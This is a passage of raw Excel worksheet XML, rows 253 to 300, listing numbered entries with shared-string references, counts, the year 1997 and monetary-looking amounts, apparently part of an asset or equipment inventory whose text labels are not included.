        <v>1</v>
      </c>
      <c r="I253" s="11">
        <v>1997</v>
      </c>
      <c r="J253" s="91"/>
      <c r="K253" s="99">
        <v>560</v>
      </c>
      <c r="L253" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M253" s="225"/>
    </row>
    <row r="254" ht="14.25" customHeight="1" spans="2:13">
      <c r="B254" s="11">
        <v>244</v>
      </c>
      <c r="C254" s="11"/>
      <c r="D254" s="10" t="s">
        <v>880</v>
      </c>
      <c r="E254" s="10"/>
      <c r="F254" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G254" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H254" s="11">
        <v>1</v>
      </c>
      <c r="I254" s="11">
        <v>1997</v>
      </c>
      <c r="J254" s="91"/>
      <c r="K254" s="99">
        <v>240</v>
      </c>
      <c r="L254" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M254" s="225"/>
    </row>
    <row r="255" ht="14.25" customHeight="1" spans="2:13">
      <c r="B255" s="11">
        <v>245</v>
      </c>
      <c r="C255" s="11"/>
      <c r="D255" s="10" t="s">
        <v>854</v>
      </c>
      <c r="E255" s="10"/>
      <c r="F255" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G255" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H255" s="11">
        <v>1</v>
      </c>
      <c r="I255" s="11">
        <v>1997</v>
      </c>
      <c r="J255" s="91"/>
      <c r="K255" s="99">
        <v>240</v>
      </c>
      <c r="L255" s="10"/>
      <c r="M255" s="225"/>
    </row>
    <row r="256" ht="14.25" customHeight="1" spans="2:13">
      <c r="B256" s="11">
        <v>246</v>
      </c>
      <c r="C256" s="11"/>
      <c r="D256" s="10" t="s">
        <v>851</v>
      </c>
      <c r="E256" s="10"/>
      <c r="F256" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G256" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H256" s="11">
        <v>1</v>
      </c>
      <c r="I256" s="11">
        <v>1997</v>
      </c>
      <c r="J256" s="91"/>
      <c r="K256" s="99">
        <v>1400</v>
      </c>
      <c r="L256" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M256" s="225"/>
    </row>
    <row r="257" ht="14.25" customHeight="1" spans="2:13">
      <c r="B257" s="11">
        <v>247</v>
      </c>
      <c r="C257" s="11"/>
      <c r="D257" s="10" t="s">
        <v>852</v>
      </c>
      <c r="E257" s="10"/>
      <c r="F257" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G257" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H257" s="11">
        <v>1</v>
      </c>
      <c r="I257" s="11">
        <v>1997</v>
      </c>
      <c r="J257" s="91"/>
      <c r="K257" s="99">
        <v>320</v>
      </c>
      <c r="L257" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M257" s="225"/>
    </row>
    <row r="258" ht="14.25" customHeight="1" spans="2:13">
      <c r="B258" s="11">
        <v>248</v>
      </c>
      <c r="C258" s="11"/>
      <c r="D258" s="10" t="s">
        <v>856</v>
      </c>
      <c r="E258" s="10"/>
      <c r="F258" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G258" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H258" s="11">
        <v>1</v>
      </c>
      <c r="I258" s="11">
        <v>1997</v>
      </c>
      <c r="J258" s="91"/>
      <c r="K258" s="99">
        <v>240</v>
      </c>
      <c r="L258" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M258" s="225"/>
    </row>
    <row r="259" ht="14.25" customHeight="1" spans="2:13">
      <c r="B259" s="11">
        <v>249</v>
      </c>
      <c r="C259" s="11"/>
      <c r="D259" s="10" t="s">
        <v>857</v>
      </c>
      <c r="E259" s="10"/>
      <c r="F259" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G259" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H259" s="11">
        <v>1</v>
      </c>
      <c r="I259" s="11">
        <v>1997</v>
      </c>
      <c r="J259" s="91"/>
      <c r="K259" s="99">
        <v>600</v>
      </c>
      <c r="L259" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M259" s="225"/>
    </row>
    <row r="260" ht="14.25" customHeight="1" spans="2:13">
      <c r="B260" s="11">
        <v>250</v>
      </c>
      <c r="C260" s="11"/>
      <c r="D260" s="10" t="s">
        <v>853</v>
      </c>
      <c r="E260" s="10"/>
      <c r="F260" s="9" t="s">
        <v>836</v>
      </c>
      <c r="G260" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H260" s="11">
        <v>1</v>
      </c>
      <c r="I260" s="11">
        <v>1997</v>
      </c>
      <c r="J260" s="91"/>
      <c r="K260" s="99">
        <v>240</v>
      </c>
      <c r="L260" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M260" s="225"/>
    </row>
    <row r="261" ht="14.25" customHeight="1" spans="1:13">
      <c r="A261" s="175"/>
      <c r="B261" s="11">
        <v>251</v>
      </c>
      <c r="C261" s="11"/>
      <c r="D261" s="10" t="s">
        <v>881</v>
      </c>
      <c r="E261" s="10"/>
      <c r="F261" s="9" t="s">
        <v>882</v>
      </c>
      <c r="G261" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H261" s="11">
        <v>1</v>
      </c>
      <c r="I261" s="11">
        <v>1997</v>
      </c>
      <c r="J261" s="91"/>
      <c r="K261" s="99">
        <v>3000</v>
      </c>
      <c r="L261" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M261" s="225"/>
    </row>
    <row r="262" ht="14.25" customHeight="1" spans="2:13">
      <c r="B262" s="11">
        <v>252</v>
      </c>
      <c r="C262" s="11"/>
      <c r="D262" s="10" t="s">
        <v>536</v>
      </c>
      <c r="E262" s="10"/>
      <c r="F262" s="9" t="s">
        <v>883</v>
      </c>
      <c r="G262" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H262" s="11">
        <v>1</v>
      </c>
      <c r="I262" s="11">
        <v>1997</v>
      </c>
      <c r="J262" s="91"/>
      <c r="K262" s="99">
        <v>480</v>
      </c>
      <c r="L262" s="10" t="s">
        <v>872</v>
      </c>
      <c r="M262" s="225"/>
    </row>
    <row r="263" ht="14.25" customHeight="1" spans="2:13">
      <c r="B263" s="226" t="s">
        <v>884</v>
      </c>
      <c r="C263" s="227"/>
      <c r="D263" s="228"/>
      <c r="E263" s="10"/>
      <c r="F263" s="9"/>
      <c r="G263" s="88"/>
      <c r="H263" s="11"/>
      <c r="I263" s="11"/>
      <c r="J263" s="91"/>
      <c r="K263" s="99">
        <v>0</v>
      </c>
      <c r="L263" s="10"/>
      <c r="M263" s="225"/>
    </row>
    <row r="264" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A264" s="176"/>
      <c r="B264" s="16">
        <v>253</v>
      </c>
      <c r="C264" s="237" t="s">
        <v>885</v>
      </c>
      <c r="D264" s="238" t="s">
        <v>886</v>
      </c>
      <c r="E264" s="237" t="s">
        <v>887</v>
      </c>
      <c r="F264" s="201"/>
      <c r="G264" s="16"/>
      <c r="H264" s="11">
        <v>3</v>
      </c>
      <c r="I264" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J264" s="91">
        <v>51000</v>
      </c>
      <c r="K264" s="99">
        <v>0</v>
      </c>
      <c r="L264" s="239" t="s">
        <v>888</v>
      </c>
      <c r="M264" s="225"/>
    </row>
    <row r="265" ht="14.25" customHeight="1" spans="2:13">
      <c r="B265" s="11">
        <v>254</v>
      </c>
      <c r="C265" s="237" t="s">
        <v>889</v>
      </c>
      <c r="D265" s="238" t="s">
        <v>881</v>
      </c>
      <c r="E265" s="238" t="s">
        <v>890</v>
      </c>
      <c r="F265" s="14"/>
      <c r="G265" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H265" s="11">
        <v>3</v>
      </c>
      <c r="I265" s="237" t="s">
        <v>748</v>
      </c>
      <c r="J265" s="91">
        <v>345000</v>
      </c>
      <c r="K265" s="99">
        <v>16800</v>
      </c>
      <c r="L265" s="238" t="s">
        <v>891</v>
      </c>
      <c r="M265" s="225"/>
    </row>
    <row r="266" ht="14.25" customHeight="1" spans="2:13">
      <c r="B266" s="11">
        <v>255</v>
      </c>
      <c r="C266" s="237" t="s">
        <v>892</v>
      </c>
      <c r="D266" s="238" t="s">
        <v>832</v>
      </c>
      <c r="E266" s="238" t="s">
        <v>893</v>
      </c>
      <c r="F266" s="9" t="s">
        <v>429</v>
      </c>
      <c r="G266" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H266" s="11">
        <v>2</v>
      </c>
      <c r="I266" s="237" t="s">
        <v>894</v>
      </c>
      <c r="J266" s="91">
        <v>4832000</v>
      </c>
      <c r="K266" s="99">
        <v>1008000</v>
      </c>
      <c r="L266" s="238" t="s">
        <v>895</v>
      </c>
      <c r="M266" s="225"/>
    </row>
    <row r="267" ht="14.25" customHeight="1" spans="2:13">
      <c r="B267" s="11">
        <v>256</v>
      </c>
      <c r="C267" s="11"/>
      <c r="D267" s="10" t="s">
        <v>896</v>
      </c>
      <c r="E267" s="10" t="s">
        <v>897</v>
      </c>
      <c r="F267" s="9" t="s">
        <v>898</v>
      </c>
      <c r="G267" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H267" s="11">
        <v>1</v>
      </c>
      <c r="I267" s="11">
        <v>1997</v>
      </c>
      <c r="J267" s="91"/>
      <c r="K267" s="99">
        <v>3000</v>
      </c>
      <c r="L267" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M267" s="225"/>
    </row>
    <row r="268" ht="14.25" customHeight="1" spans="2:13">
      <c r="B268" s="11">
        <v>257</v>
      </c>
      <c r="C268" s="11"/>
      <c r="D268" s="10" t="s">
        <v>536</v>
      </c>
      <c r="E268" s="10" t="s">
        <v>899</v>
      </c>
      <c r="F268" s="9" t="s">
        <v>900</v>
      </c>
      <c r="G268" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H268" s="11">
        <v>1</v>
      </c>
      <c r="I268" s="11">
        <v>1997</v>
      </c>
      <c r="J268" s="91"/>
      <c r="K268" s="99">
        <v>360</v>
      </c>
      <c r="L268" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M268" s="225"/>
    </row>
    <row r="269" ht="14.25" customHeight="1" spans="2:13">
      <c r="B269" s="11">
        <v>258</v>
      </c>
      <c r="C269" s="11"/>
      <c r="D269" s="10" t="s">
        <v>901</v>
      </c>
      <c r="E269" s="10"/>
      <c r="F269" s="9"/>
      <c r="G269" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H269" s="11">
        <v>1</v>
      </c>
      <c r="I269" s="11"/>
      <c r="J269" s="91"/>
      <c r="K269" s="99">
        <v>120</v>
      </c>
      <c r="L269" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M269" s="225"/>
    </row>
    <row r="270" ht="14.25" customHeight="1" spans="2:13">
      <c r="B270" s="11">
        <v>259</v>
      </c>
      <c r="C270" s="11"/>
      <c r="D270" s="10" t="s">
        <v>842</v>
      </c>
      <c r="E270" s="10"/>
      <c r="F270" s="9"/>
      <c r="G270" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H270" s="11">
        <v>1</v>
      </c>
      <c r="I270" s="11"/>
      <c r="J270" s="91"/>
      <c r="K270" s="99">
        <v>2200</v>
      </c>
      <c r="L270" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M270" s="225"/>
    </row>
    <row r="271" ht="14.25" customHeight="1" spans="2:13">
      <c r="B271" s="11">
        <v>260</v>
      </c>
      <c r="C271" s="11"/>
      <c r="D271" s="10" t="s">
        <v>846</v>
      </c>
      <c r="E271" s="10"/>
      <c r="F271" s="9"/>
      <c r="G271" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H271" s="11">
        <v>1</v>
      </c>
      <c r="I271" s="11"/>
      <c r="J271" s="91"/>
      <c r="K271" s="99">
        <v>480</v>
      </c>
      <c r="L271" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M271" s="225"/>
    </row>
    <row r="272" ht="14.25" customHeight="1" spans="2:13">
      <c r="B272" s="11">
        <v>261</v>
      </c>
      <c r="C272" s="11"/>
      <c r="D272" s="10" t="s">
        <v>874</v>
      </c>
      <c r="E272" s="10"/>
      <c r="F272" s="9"/>
      <c r="G272" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H272" s="11">
        <v>1</v>
      </c>
      <c r="I272" s="11"/>
      <c r="J272" s="91"/>
      <c r="K272" s="99">
        <v>680</v>
      </c>
      <c r="L272" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M272" s="225"/>
    </row>
    <row r="273" ht="14.25" customHeight="1" spans="2:13">
      <c r="B273" s="11">
        <v>262</v>
      </c>
      <c r="C273" s="11"/>
      <c r="D273" s="10" t="s">
        <v>902</v>
      </c>
      <c r="E273" s="10"/>
      <c r="F273" s="9"/>
      <c r="G273" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H273" s="11">
        <v>1</v>
      </c>
      <c r="I273" s="11"/>
      <c r="J273" s="91"/>
      <c r="K273" s="99">
        <v>360</v>
      </c>
      <c r="L273" s="10"/>
      <c r="M273" s="225"/>
    </row>
    <row r="274" ht="14.25" customHeight="1" spans="2:13">
      <c r="B274" s="11">
        <v>263</v>
      </c>
      <c r="C274" s="11"/>
      <c r="D274" s="10" t="s">
        <v>844</v>
      </c>
      <c r="E274" s="10"/>
      <c r="F274" s="9"/>
      <c r="G274" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H274" s="11">
        <v>1</v>
      </c>
      <c r="I274" s="11"/>
      <c r="J274" s="91"/>
      <c r="K274" s="99">
        <v>1280</v>
      </c>
      <c r="L274" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M274" s="225"/>
    </row>
    <row r="275" ht="14.25" customHeight="1" spans="2:13">
      <c r="B275" s="11">
        <v>264</v>
      </c>
      <c r="C275" s="11"/>
      <c r="D275" s="10" t="s">
        <v>848</v>
      </c>
      <c r="E275" s="10"/>
      <c r="F275" s="9"/>
      <c r="G275" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H275" s="11">
        <v>1</v>
      </c>
      <c r="I275" s="11"/>
      <c r="J275" s="91"/>
      <c r="K275" s="99">
        <v>480</v>
      </c>
      <c r="L275" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M275" s="225"/>
    </row>
    <row r="276" ht="14.25" customHeight="1" spans="2:13">
      <c r="B276" s="11">
        <v>265</v>
      </c>
      <c r="C276" s="11"/>
      <c r="D276" s="10" t="s">
        <v>847</v>
      </c>
      <c r="E276" s="10"/>
      <c r="F276" s="9"/>
      <c r="G276" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H276" s="11">
        <v>1</v>
      </c>
      <c r="I276" s="11"/>
      <c r="J276" s="91"/>
      <c r="K276" s="99">
        <v>260</v>
      </c>
      <c r="L276" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M276" s="225"/>
    </row>
    <row r="277" ht="14.25" customHeight="1" spans="2:13">
      <c r="B277" s="11">
        <v>266</v>
      </c>
      <c r="C277" s="11"/>
      <c r="D277" s="10" t="s">
        <v>903</v>
      </c>
      <c r="E277" s="10"/>
      <c r="F277" s="9"/>
      <c r="G277" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H277" s="11">
        <v>1</v>
      </c>
      <c r="I277" s="11"/>
      <c r="J277" s="91"/>
      <c r="K277" s="99">
        <v>320</v>
      </c>
      <c r="L277" s="10"/>
      <c r="M277" s="225"/>
    </row>
    <row r="278" ht="14.25" customHeight="1" spans="2:13">
      <c r="B278" s="11">
        <v>267</v>
      </c>
      <c r="C278" s="11"/>
      <c r="D278" s="10" t="s">
        <v>849</v>
      </c>
      <c r="E278" s="10"/>
      <c r="F278" s="9"/>
      <c r="G278" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H278" s="11">
        <v>1</v>
      </c>
      <c r="I278" s="11"/>
      <c r="J278" s="91"/>
      <c r="K278" s="99">
        <v>1800</v>
      </c>
      <c r="L278" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M278" s="225"/>
    </row>
    <row r="279" ht="14.25" customHeight="1" spans="2:13">
      <c r="B279" s="11">
        <v>268</v>
      </c>
      <c r="C279" s="11"/>
      <c r="D279" s="10" t="s">
        <v>850</v>
      </c>
      <c r="E279" s="10"/>
      <c r="F279" s="9"/>
      <c r="G279" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H279" s="11">
        <v>1</v>
      </c>
      <c r="I279" s="11"/>
      <c r="J279" s="91"/>
      <c r="K279" s="99">
        <v>200</v>
      </c>
      <c r="L279" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M279" s="225"/>
    </row>
    <row r="280" ht="14.25" customHeight="1" spans="2:13">
      <c r="B280" s="11">
        <v>269</v>
      </c>
      <c r="C280" s="11"/>
      <c r="D280" s="10" t="s">
        <v>845</v>
      </c>
      <c r="E280" s="10"/>
      <c r="F280" s="9"/>
      <c r="G280" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H280" s="11">
        <v>1</v>
      </c>
      <c r="I280" s="11"/>
      <c r="J280" s="91"/>
      <c r="K280" s="99">
        <v>280</v>
      </c>
      <c r="L280" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M280" s="225"/>
    </row>
    <row r="281" ht="14.25" customHeight="1" spans="2:13">
      <c r="B281" s="11">
        <v>270</v>
      </c>
      <c r="C281" s="11"/>
      <c r="D281" s="10" t="s">
        <v>904</v>
      </c>
      <c r="E281" s="10"/>
      <c r="F281" s="9"/>
      <c r="G281" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H281" s="11">
        <v>1</v>
      </c>
      <c r="I281" s="11"/>
      <c r="J281" s="91"/>
      <c r="K281" s="99">
        <v>260</v>
      </c>
      <c r="L281" s="10"/>
      <c r="M281" s="225"/>
    </row>
    <row r="282" ht="14.25" customHeight="1" spans="2:13">
      <c r="B282" s="11">
        <v>271</v>
      </c>
      <c r="C282" s="11"/>
      <c r="D282" s="10" t="s">
        <v>851</v>
      </c>
      <c r="E282" s="10"/>
      <c r="F282" s="9"/>
      <c r="G282" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H282" s="11">
        <v>1</v>
      </c>
      <c r="I282" s="11"/>
      <c r="J282" s="91"/>
      <c r="K282" s="99">
        <v>1800</v>
      </c>
      <c r="L282" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M282" s="225"/>
    </row>
    <row r="283" ht="14.25" customHeight="1" spans="2:13">
      <c r="B283" s="11">
        <v>272</v>
      </c>
      <c r="C283" s="11"/>
      <c r="D283" s="10" t="s">
        <v>905</v>
      </c>
      <c r="E283" s="10"/>
      <c r="F283" s="9"/>
      <c r="G283" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H283" s="11">
        <v>1</v>
      </c>
      <c r="I283" s="11"/>
      <c r="J283" s="91"/>
      <c r="K283" s="99">
        <v>240</v>
      </c>
      <c r="L283" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M283" s="225"/>
    </row>
    <row r="284" ht="14.25" customHeight="1" spans="2:13">
      <c r="B284" s="11">
        <v>273</v>
      </c>
      <c r="C284" s="11"/>
      <c r="D284" s="10" t="s">
        <v>852</v>
      </c>
      <c r="E284" s="10"/>
      <c r="F284" s="9"/>
      <c r="G284" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H284" s="11">
        <v>1</v>
      </c>
      <c r="I284" s="11"/>
      <c r="J284" s="91"/>
      <c r="K284" s="99">
        <v>320</v>
      </c>
      <c r="L284" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M284" s="225"/>
    </row>
    <row r="285" ht="14.25" customHeight="1" spans="2:13">
      <c r="B285" s="11">
        <v>274</v>
      </c>
      <c r="C285" s="11"/>
      <c r="D285" s="10" t="s">
        <v>854</v>
      </c>
      <c r="E285" s="10"/>
      <c r="F285" s="9"/>
      <c r="G285" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H285" s="11">
        <v>1</v>
      </c>
      <c r="I285" s="11"/>
      <c r="J285" s="91"/>
      <c r="K285" s="99">
        <v>240</v>
      </c>
      <c r="L285" s="10"/>
      <c r="M285" s="225"/>
    </row>
    <row r="286" ht="14.25" customHeight="1" spans="2:13">
      <c r="B286" s="11">
        <v>275</v>
      </c>
      <c r="C286" s="11"/>
      <c r="D286" s="10" t="s">
        <v>906</v>
      </c>
      <c r="E286" s="10"/>
      <c r="F286" s="9"/>
      <c r="G286" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H286" s="11">
        <v>1</v>
      </c>
      <c r="I286" s="11"/>
      <c r="J286" s="91"/>
      <c r="K286" s="99">
        <v>600</v>
      </c>
      <c r="L286" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M286" s="225"/>
    </row>
    <row r="287" ht="14.25" customHeight="1" spans="2:13">
      <c r="B287" s="11">
        <v>276</v>
      </c>
      <c r="C287" s="11"/>
      <c r="D287" s="10" t="s">
        <v>907</v>
      </c>
      <c r="E287" s="10"/>
      <c r="F287" s="9"/>
      <c r="G287" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H287" s="11">
        <v>1</v>
      </c>
      <c r="I287" s="11"/>
      <c r="J287" s="91"/>
      <c r="K287" s="99">
        <v>480</v>
      </c>
      <c r="L287" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M287" s="225"/>
    </row>
    <row r="288" ht="14.25" customHeight="1" spans="2:13">
      <c r="B288" s="11">
        <v>277</v>
      </c>
      <c r="C288" s="11"/>
      <c r="D288" s="10" t="s">
        <v>840</v>
      </c>
      <c r="E288" s="10"/>
      <c r="F288" s="9"/>
      <c r="G288" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H288" s="11">
        <v>1</v>
      </c>
      <c r="I288" s="11"/>
      <c r="J288" s="91"/>
      <c r="K288" s="99">
        <v>1800</v>
      </c>
      <c r="L288" s="10" t="s">
        <v>891</v>
      </c>
      <c r="M288" s="225"/>
    </row>
    <row r="289" ht="14.25" customHeight="1" spans="2:13">
      <c r="B289" s="226" t="s">
        <v>908</v>
      </c>
      <c r="C289" s="227"/>
      <c r="D289" s="228"/>
      <c r="E289" s="10"/>
      <c r="F289" s="14"/>
      <c r="G289" s="11"/>
      <c r="H289" s="11"/>
      <c r="I289" s="11"/>
      <c r="J289" s="91"/>
      <c r="K289" s="99">
        <v>0</v>
      </c>
      <c r="L289" s="10"/>
      <c r="M289" s="225"/>
    </row>
    <row r="290" ht="14.25" customHeight="1" spans="2:13">
      <c r="B290" s="16">
        <v>278</v>
      </c>
      <c r="C290" s="237" t="s">
        <v>909</v>
      </c>
      <c r="D290" s="238" t="s">
        <v>910</v>
      </c>
      <c r="E290" s="237" t="s">
        <v>911</v>
      </c>
      <c r="F290" s="17"/>
      <c r="G290" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H290" s="11">
        <v>1</v>
      </c>
      <c r="I290" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J290" s="100">
        <v>6500</v>
      </c>
      <c r="K290" s="99">
        <v>864</v>
      </c>
      <c r="L290" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M290" s="225"/>
    </row>
    <row r="291" ht="14.25" customHeight="1" spans="2:13">
      <c r="B291" s="16">
        <v>279</v>
      </c>
      <c r="C291" s="237" t="s">
        <v>913</v>
      </c>
      <c r="D291" s="238" t="s">
        <v>914</v>
      </c>
      <c r="E291" s="11"/>
      <c r="F291" s="17"/>
      <c r="G291" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H291" s="11">
        <v>1</v>
      </c>
      <c r="I291" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J291" s="100">
        <v>10000</v>
      </c>
      <c r="K291" s="99">
        <v>840</v>
      </c>
      <c r="L291" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M291" s="225"/>
    </row>
    <row r="292" ht="14.25" customHeight="1" spans="2:13">
      <c r="B292" s="16">
        <v>280</v>
      </c>
      <c r="C292" s="237" t="s">
        <v>915</v>
      </c>
      <c r="D292" s="238" t="s">
        <v>916</v>
      </c>
      <c r="E292" s="11"/>
      <c r="F292" s="17"/>
      <c r="G292" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H292" s="11">
        <v>1</v>
      </c>
      <c r="I292" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J292" s="100">
        <v>6500</v>
      </c>
      <c r="K292" s="99">
        <v>780</v>
      </c>
      <c r="L292" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M292" s="225"/>
    </row>
    <row r="293" ht="14.25" customHeight="1" spans="2:13">
      <c r="B293" s="16">
        <v>281</v>
      </c>
      <c r="C293" s="237" t="s">
        <v>917</v>
      </c>
      <c r="D293" s="238" t="s">
        <v>918</v>
      </c>
      <c r="E293" s="237" t="s">
        <v>919</v>
      </c>
      <c r="F293" s="17"/>
      <c r="G293" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H293" s="11">
        <v>1</v>
      </c>
      <c r="I293" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J293" s="100">
        <v>51600</v>
      </c>
      <c r="K293" s="99">
        <v>6192</v>
      </c>
      <c r="L293" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M293" s="225"/>
    </row>
    <row r="294" ht="14.25" customHeight="1" spans="2:13">
      <c r="B294" s="16">
        <v>282</v>
      </c>
      <c r="C294" s="237" t="s">
        <v>920</v>
      </c>
      <c r="D294" s="238" t="s">
        <v>921</v>
      </c>
      <c r="E294" s="237" t="s">
        <v>922</v>
      </c>
      <c r="F294" s="17"/>
      <c r="G294" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H294" s="11">
        <v>1</v>
      </c>
      <c r="I294" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J294" s="100">
        <v>55700</v>
      </c>
      <c r="K294" s="99">
        <v>14400</v>
      </c>
      <c r="L294" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M294" s="225"/>
    </row>
    <row r="295" ht="14.25" customHeight="1" spans="2:13">
      <c r="B295" s="16">
        <v>283</v>
      </c>
      <c r="C295" s="237" t="s">
        <v>923</v>
      </c>
      <c r="D295" s="238" t="s">
        <v>924</v>
      </c>
      <c r="E295" s="237" t="s">
        <v>925</v>
      </c>
      <c r="F295" s="17"/>
      <c r="G295" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H295" s="11">
        <v>1</v>
      </c>
      <c r="I295" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J295" s="100">
        <v>21000</v>
      </c>
      <c r="K295" s="99">
        <v>3360</v>
      </c>
      <c r="L295" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M295" s="225"/>
    </row>
    <row r="296" ht="14.25" customHeight="1" spans="2:13">
      <c r="B296" s="16">
        <v>284</v>
      </c>
      <c r="C296" s="237" t="s">
        <v>926</v>
      </c>
      <c r="D296" s="238" t="s">
        <v>927</v>
      </c>
      <c r="E296" s="237" t="s">
        <v>928</v>
      </c>
      <c r="F296" s="17"/>
      <c r="G296" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H296" s="11">
        <v>1</v>
      </c>
      <c r="I296" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J296" s="100">
        <v>51000</v>
      </c>
      <c r="K296" s="99">
        <v>6120</v>
      </c>
      <c r="L296" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M296" s="225"/>
    </row>
    <row r="297" ht="14.25" customHeight="1" spans="2:13">
      <c r="B297" s="16">
        <v>285</v>
      </c>
      <c r="C297" s="237" t="s">
        <v>929</v>
      </c>
      <c r="D297" s="238" t="s">
        <v>930</v>
      </c>
      <c r="E297" s="238" t="s">
        <v>922</v>
      </c>
      <c r="F297" s="9"/>
      <c r="G297" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H297" s="11">
        <v>2</v>
      </c>
      <c r="I297" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J297" s="91">
        <v>144000</v>
      </c>
      <c r="K297" s="99">
        <v>9600</v>
      </c>
      <c r="L297" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M297" s="225"/>
    </row>
    <row r="298" ht="14.25" customHeight="1" spans="2:13">
      <c r="B298" s="16">
        <v>286</v>
      </c>
      <c r="C298" s="237" t="s">
        <v>931</v>
      </c>
      <c r="D298" s="238" t="s">
        <v>932</v>
      </c>
      <c r="E298" s="237" t="s">
        <v>933</v>
      </c>
      <c r="F298" s="17"/>
      <c r="G298" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H298" s="11">
        <v>1</v>
      </c>
      <c r="I298" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J298" s="100">
        <v>2226000</v>
      </c>
      <c r="K298" s="99">
        <v>24000</v>
      </c>
      <c r="L298" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M298" s="225"/>
    </row>
    <row r="299" ht="14.25" customHeight="1" spans="2:13">
      <c r="B299" s="16">
        <v>287</v>
      </c>
      <c r="C299" s="237" t="s">
        <v>934</v>
      </c>
      <c r="D299" s="238" t="s">
        <v>935</v>
      </c>
      <c r="E299" s="237" t="s">
        <v>936</v>
      </c>
      <c r="F299" s="17"/>
      <c r="G299" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H299" s="11">
        <v>1</v>
      </c>
      <c r="I299" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J299" s="100">
        <v>642000</v>
      </c>
      <c r="K299" s="99">
        <v>62400</v>
      </c>
      <c r="L299" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M299" s="225"/>
    </row>
    <row r="300" ht="14.25" customHeight="1" spans="1:13">
      <c r="A300" s="175"/>
      <c r="B300" s="16">
        <v>288</v>
      </c>
      <c r="C300" s="237" t="s">
        <v>937</v>
      </c>
      <c r="D300" s="238" t="s">
        <v>938</v>
      </c>
      <c r="E300" s="237" t="s">
        <v>939</v>
      </c>
